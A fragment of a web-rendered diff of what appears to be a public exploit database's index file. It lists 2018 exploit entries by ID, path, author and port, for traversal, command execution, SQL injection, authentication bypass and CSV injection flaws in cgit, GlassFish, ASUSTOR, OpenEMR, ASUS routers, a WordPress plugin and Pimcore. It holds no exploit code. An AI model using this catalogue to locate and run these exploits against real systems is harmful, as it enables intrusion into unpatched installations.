45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
|
45195,exploits/linux/webapps/45195.rb,"cgit 1.2.1 - Directory Traversal (Metasploit)",2018-08-14,"Dhiraj Mishra",webapps,linux,
|
||||||
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
|
45196,exploits/windows/webapps/45196.rb,"Oracle GlassFish Server Open Source Edition 4.1 - Path Traversal (Metasploit)",2018-08-14,Metasploit,webapps,windows,4848
|
||||||
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
|
45200,exploits/cgi/webapps/45200.txt,"ASUSTOR ADM 3.1.0.RFQ3 - Remote Command Execution / SQL Injection",2018-08-15,"Kyle Lovett",webapps,cgi,8001
|
||||||
|
45202,exploits/linux/webapps/45202.txt,"OpenEMR 5.0.1.3 - Arbitrary File Actions",2018-08-16,"Joshua Fam",webapps,linux,
|
||||||
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
|
45201,exploits/hardware/webapps/45201.txt,"ASUS-DSL N10 1.1.2.2_17 - Authentication Bypass",2018-08-15,AmnBAN,webapps,hardware,
|
||||||
|
45206,exploits/php/webapps/45206.txt,"Wordpress Plugin Export Users to CSV 1.1.1 - CSV Injection",2018-08-16,"Javier Olmedo",webapps,php,
|
||||||
|
45208,exploits/php/webapps/45208.txt,"Pimcore 5.2.3 - SQL Injection / Cross-Site Scripting / Cross-Site Request Forgery",2018-08-16,"SEC Consult",webapps,php,80
|
||||||
|
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue